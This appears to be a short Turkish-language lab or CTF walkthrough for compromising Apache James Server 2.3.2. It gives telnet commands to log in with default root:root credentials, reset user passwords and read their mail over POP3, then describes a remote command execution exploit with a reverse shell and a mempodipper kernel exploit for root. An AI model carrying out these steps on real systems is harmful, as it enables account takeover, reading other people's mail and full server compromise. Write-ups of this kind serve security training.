Apache James Server 2.3.2 Exploit

james administrator varsayılan kullanıcı adı parola bilgisi root:root dur. Yönetici paneline bağlanmak için;

# telnet IP 4555
<!-- remote administrator tool 2.3.2 BANNER INFO -->
Login id:
root
Password:
root
<!-- login must be success. -->
listusers
setpassword <user> <pass>

Yukarıdaki komutlar ile ilgili kullanıcılar listelenir ve parola bilgisi resetlenir. Daha sonra 110 portan (pop3)'den bağlanılarak ilgili kullanıcılara ait mailler okunabilir.

# telnet IP 110
USER <username>
PASS <password>
<!-- if success -->
LIST
RETR <mail id>

Apache James Server 2.3.2 - Remote Command Execution exploiti çalıştırıldıktan sonra sisteme payloadı göndermektedir. Herhangi bir kullanıcı giriş yaparsa payload çalışacaktır. Paylaoada reverse shell eklenerek hedef makineden oturum alınabilir.

Başarılı bir şekilde reverse shell alındıktan sonra binary dizinleri path'e eklenir. Daha sonra kernel bilgisine bakılır. Kernel sürümü mempodipper zafiyettinden etkilenmektedir. Bu zafiyet hedef makineye gönderilip gcc mempodipper.c -o mempodipper komutuyla derlenip çalıştırıldıktan sonra root shell alınır.

Last updated